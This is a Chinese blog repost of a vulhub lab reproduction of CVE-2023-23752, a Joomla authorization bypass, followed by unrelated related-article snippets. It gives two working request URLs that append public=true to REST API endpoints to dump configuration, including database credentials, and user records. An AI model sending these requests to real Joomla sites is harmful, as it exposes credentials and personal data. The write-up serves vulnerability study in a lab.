程序员经验分享-hwhale

【漏洞复现】CVE-2023-23752 Joomla权限绕过漏洞

2023-10-30

环境搭建

sudo docker-compose up -d

查看端口号

sudo docker ps

 服务启动后,访问http://your-ip:8080即可查看到Joomla页面

 这个漏洞是由于错误的属性覆盖导致的,攻击者可以通过在访问Rest API时传入参数public=true来绕过权限校验。比如,访问下面这个链接即可读取所有配置项,包括数据库连接用户名和密码:

http://your-ip:8080/api/index.php/v1/config/application?public=true

 如果不添加public=true,则访问会被拒绝:

 访问下面这个链接即可读取所有用户信息,包含邮箱等:

http://your-ip:8080/api/index.php/v1/users?public=true

 

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

vulhub漏洞复现

安全

web安全

【漏洞复现】CVE-2023-23752 Joomla权限绕过漏洞 的相关文章

  • IT圈大实话!卷运维不如卷网络安全

    前言 在刚刚过去的金九银十 我进行了多场网络安全的技术面试 我发现最近很多从事运维的选择了辞职 转行到了网络安全这个发展路线 说实话 运维工程师这个岗位在IT行业里面确实是处于最底层的 不管什么环节出现问题 基本都是运维背锅 薪资水平也比不

  • 为什么这么多人自学黑客,但没过多久就放弃了(掌握正确的网络安全学习路线很重要)

    网络安全是一个 不断发展和演变 的领域 以下是一个 网络安全学习路线规划 旨在帮助初学者快速入门和提高自己的技能 基础知识 网络安全的 基础知识 包括 网络结构 操作系统 编程语言 等方面的知识 学习这些基础知识对理解网络安全的原理和技术至

  • 一个网工(网络工程师)七年的职业血泪史....

    前言 一个工作了七年的老网工 上家公司待了五年 现在这家公司也快三年了 分享一些我自己学习网络安全路上的一些经历 也算是帮大家少走些弯路 一 如何学习网络安全 1 不要试图以编程为基础去学习网络安全 不要以编程为基础再开始学习网络安全 一般

  • 适用于任何公司的网络安全架构

    1 第一等级 基础级 优势 可防范基本有针对性的攻击 使攻击者难以在网络上推进 将生产环境与企业环境进行基本隔离 劣势 默认的企业网络应被视为潜在受损 普通员工的工作站以及管理员的工作站可能受到潜在威胁 因为它们在生产网络中具有基本和管理员

  • The Planets:Venus

    靶场下载 The Planets Venus VulnHub 信息收集 arp scan l Interface eth0 type EN10MB MAC 00 0c 29 43 7c b1 IPv4 192 168 1 60 Starti

  • Web 安全漏洞之 OS 命令注入

    什么是 OS 命令注入 上周我们分享了一篇 Web 安全漏洞之 SQL 注入 其原理简单来说就是因为 SQL 是一种结构化字符串语言 攻击者利用可以随意构造语句的漏洞构造了开发者意料之外的语句 而今天要讲的 OS 命令注入其实原理和 SQL

  • WEB前端常见受攻击方式及解决办法总结

    一个网址建立后 如果不注意安全问题 就很容易被人攻击 下面讨论一下集中漏洞情况和放置攻击的方法 一 SQL注入 所谓的SQL注入 就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串 最终达到欺骗服务器执行恶意的SQL命

  • J2EE常见面试题(一)

    StringBuilder和StringBuffer的区别 String 字符串常量 不可变 使用字符串拼接时是不同的2个空间 StringBuffer 字符串变量 可变 线程安全 字符串拼接直接在字符串后追加 StringBuilder

  • 用户数据中的幸存者偏差

    幸存者偏差 Survivorship bias 是一种常见的逻辑谬误 意思是没有考虑到筛选的过程 忽略了被筛选掉的关键信息 只看到经过筛选后而产生的结果 先讲个故事 二战时 无奈德国空防强大 盟军战机损毁严重 于是军方便找来科学家统计飞机受

  • 2024年网络安全十10大发展趋势发布

    2023年网络安全十10大发展趋势发布 近日 中国计算机学会 CCF 计算机安全专委会中 来自国家网络安全主管部门 高校 科研院所 大型央企 民营企业的委员投票评选出2023年网络安全十大发展趋势 福利 趋势一 数据安全治理成为数字经济的基

  • Android SDK开发艺术探索(五)安全与校验

    一 前言 本篇是Android SDK开发艺术探索系列的第五篇文章 介绍了一些SDK开发中安全方面的知识 包括资源完整性 存储安全 权限校验 传输安全 代码混淆等知识 通过基础的安全配置为SDK保驾护航 探索SDK开发在安全方面的最佳实践

  • 远程控制软件安全吗?一文看懂ToDesk、RayLink、TeamViewer、Splashtop相关安全机制_raylink todesk

    目录 一 前言 二 远程控制中的安全威胁 三 国内外远控软件安全机制 ToDesk RayLink Teamviewer Splashtop 四 安全远控预防 一 前言 近期 远程控制话题再一次引起关注 据相关新闻报道 不少不法分子利用远程

  • 网络安全(黑客)自学

    1 网络安全是什么 网络安全可以基于攻击和防御视角来分类 我们经常听到的 红队 渗透测试 等就是研究攻击技术 而 蓝队 安全运营 安全运维 则研究防御技术 2 网络安全市场 一 是市场需求量高 二 则是发展相对成熟入门比较容易 3 所需要的

  • 网络安全基础知识面试题库

    1 基于路由器的攻击手段 1 1 源IP地址欺骗式攻击 入侵者从外部传输一个伪装成来自内部主机的数据包 数据包的IP是 内网的合法IP 对策 丢弃所有来自路由器外端口 却使用内部源地址的数据包 1 2 源路由攻击 入侵者让数据包循着一个不可

  • 内网安全:隧道技术详解

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一 CS反向连接上线 拿下Win2008 一 使用转发代理上线创建监听器 二 上传后门执行上线 隧道技术 SMB协议 SMB协议介绍

  • 为什么我强烈推荐大学生打CTF!

    前言 写这个文章是因为我很多粉丝都是学生 经常有人问 感觉大一第一个学期忙忙碌碌的过去了 啥都会一点 但是自己很难系统的学习到整个知识体系 很迷茫 想知道要如何高效学习 这篇文章我主要就围绕两点 减少那些罗里吧嗦的废话 直接上干货 CTF如

  • 为什么这么多人自学黑客,但没过多久就放弃了(掌握正确的网络安全学习路线很重要)

    网络安全是一个 不断发展和演变 的领域 以下是一个 网络安全学习路线规划 旨在帮助初学者快速入门和提高自己的技能 基础知识 网络安全的 基础知识 包括 网络结构 操作系统 编程语言 等方面的知识 学习这些基础知识对理解网络安全的原理和技术至

  • 【安全】简单解析统一身份认证:介绍、原理和实现方法

    深入解析统一身份认证 介绍 原理和实现方法 导语 统一身份认证是什么 统一身份认证的原理 统一身份认证的实现 结语 导语 随着互联网的发展和各种在线服务的普及 用户在不同的应用和平台上需要进行多次身份验证 为了简化用户的登录和减少重复操作

  • 【方法】如何把Excel“只读方式”变成可直接编辑?

    Excel在 只读方式 下 编辑后是无法直接保存原文件的 那如何可以直接编辑原文件呢 下面来一起看看看吧 如果Excel设置的是无密码的 只读方式 那在打开Excel后 会出现对话框 提示 是否以只读方式打开 如果想直接编辑文件 选择 否

  • 【安全】网络安全态势感知

    文章目录 一 态势感知简介 1 概念 2 形象举例 3 应具备的能力 二 为什么要态势感知 为什么网络安全态势感知很重要 三 态势感知系统的功能 四 如何评估态势感知的建设结果 五 什么是态势感知的三个层级 四 业界的态势感知产品 1 安全

随机推荐

  • 计算机的网络配置的方法是什么,怎么配置计算机网络

    在计算机安装好网络适配器且安装了该设备的驱动程序之后 需配置计算机网络的主要参数包括IP地址 子网掩码 默认网关 DNS 配置方式分为静态IP地址和动态IP地址两种设置方法 静态IP地址设置下面以Win2000为例来说明静态IP地址的设置和

  • Linux编译器-gcc/g++使用及项目自动化构建工具-make/Makefile

    目录 程序编译的过程 预处理阶段 编译阶段 汇编阶段 链接阶段 Linux中的四种阶段 gcc g 格式 make Makefile 程序编译的过程 有这样一段程序文件名为hello c include

  • linux mnit 安装boost1.58库

    1 安装依赖库文件 sudo apt get install libbz2 dev 安装mpi库 sudo apt get install libicu dev 支持正则表达式的UNICODE字符集 sudo apt get install

  • python协整与异步调用,压榨程序的摸鱼时间——使用异步编写需要循环执行的程序,并获取返回值(2)

    对于同步 异步的基础与基本的书写方法请参考上一篇博客 python协整与异步调用 压榨程序的摸鱼时间 异步改写一般程序 1 由于request本身只能发送同步的请求 因此我们使用支持异步的httpx来访问网站 对比同步与异步的写法 用同步与

  • 分布式限流之 - Spring Cloud Gateway层限流实现

    写在前面的话 高并发的三驾马车 缓存 降级 限流 这里仅仅说限流 常用的限流算法有 计数器算法 固定窗口算法 滑动窗口算法 漏桶算法 令牌桶算法 每种算法的特点和优缺点这里不展开 比较适用的限流算法基本都会选择令牌桶 并且这里基于Sprin

  • springboot-项目获取resources下文件的方法(2019.12.07补充)

    spring项目获取resources下文件的方法 最近写读取模板文件做一些后续的处理 将文件放在了项目的resources 下 发现了一个好用的读取方法 比如上边是你需要读取的文件 读取的方法如下 File file ResourceUt

  • Oracle函数--日期函数

    3 日期函数 months between add months next day last day round trunc sysdate sysdate关键字 表示系统的当前时间 select sysdate from dual 结果

  • STM32Cube HAL库——霍尔编码器测速(电机转速测量)

    STM32Cube HAL库 霍尔编码器测速 电机转速测量 一 测速原理 1 霍尔编码器概述 霍尔编码器 Hall Encoder 是一种用于测量旋转位置和方向的传感器 它通过感应磁场变化来测量旋转轴的位置和方向 霍尔编码器通常由霍尔传感器

  • ubuntu 18.04 安装 opencv(踩了很多雷终于整合成一个完整的成功版本)

    更新源 sudo apt update 安装相关包 sudo apt get install build essential cmake git libgtk2 0 dev pkg config libavcodec dev libavfo

  • [482]tf.cast()

    tf cast x dtype name None 此函数是类型转换函数 参数 x 输入 dtype 转换目标类型 name 名称 返回 Tensor 例 tensor a is 1 8 2 2 dtype tf float tf cast

  • lvs(+keepalived)、haproxy(+heartbeat)、nginx 负载均衡的比较分析

    目前使用比较多的就是标题中提到的这两者 其实lvs和haproxy都是实现的负载均衡的作用 keepalived和heartbeat都是提高高可用性的 避免单点故障 那么他们为什么这么搭配 而又有什么区别呢 经过一番google 大体明白了

  • PyTorch-11 自编码器AutoEncoders 、 Variational AutoEncoders

    PyTorch 11 自编码器AutoEncoders Variational AutoEncoders 这里我们主要涉及如何利用大量Unlabeled数据 因此Unsupervised Learning这个领域就需要解决这个问题 下图是主

  • 【实用小知识】常用的软件测试方法

    随着软件测试技术的不断发展 测试方法也越来越多样化 针对性更强 选择合适的软件测试方法可以让我们事半功倍 以下是一些常用的软件测试方法 测试 Beta测试 测试 英文是Beta testing 又称Beta测试 用户验收测试 UAT 测试是

  • Keil中的工程配置选项说明

    工程配置选项说明 工程配置栏 Device Target 1 晶振频率 2 操作系统 是否选择Keil自带的RTX操作系统 一般不选 3 系统预览文件 一般默认使用系统自带 不选择自己定义的 4 生成代码所选择的编译器 5 使用交叉模块优化

  • flutter学习之旅(一)

    初学Flutter flutter官网和中文开发手册 安装flutter windows 官方文档 windows flutter windows 3 7 9 stable zip 编辑环境变量 在 用户变量 一栏中 检查是否有 Path

  • 谷歌浏览器禁用自动更新

    解决谷歌浏览器自动升级的问题 最好 最简单的解决方式 1 找到hosts文件 文件位置C Windows System32 drivers etc 2 修改hosts文件 增加 127 0 0 1 update googleapis com

  • 基础网络详解4--HTTP Cookie&&Session 思考

    一 cookie技术思考 一台多用户浏览器发起了三笔请求 将某款产品放入购物车中 A一次 选择了篮球 B两次 第一次选了足球 第二次选了钢笔 如何确认选择篮球 足球 钢笔的请求属于谁呢 如果不确认属于谁 请求将没有意义 如果每次请求都带一个

  • &2应用层 - DNS:因特网的目录服务

    DNS DNS提供的服务 用户主机将一个HTTP请求报文发送到Web服务器的过程 DNS服务 DNS工作机理概述 DNS的一种简单设计 集中式设计 分布式 层次数据库 3种类型的DNS服务器交互的方式 本地DNS服务 DNS缓存 DNS记录

  • 统计json数组元素个数的函数

    js function getJsonLength jsonData var jsonLength 0 for var item in jsonData jsonLength return jsonLength len getJsonLen

  • 【漏洞复现】CVE-2023-23752 Joomla权限绕过漏洞

    环境搭建 sudo docker compose up d 查看端口号 sudo docker ps 服务启动后 访问http your ip 8080即可查看到Joomla页面 这个漏洞是由于错误的属性覆盖导致的 攻击者可以通过在访问Re

热门标签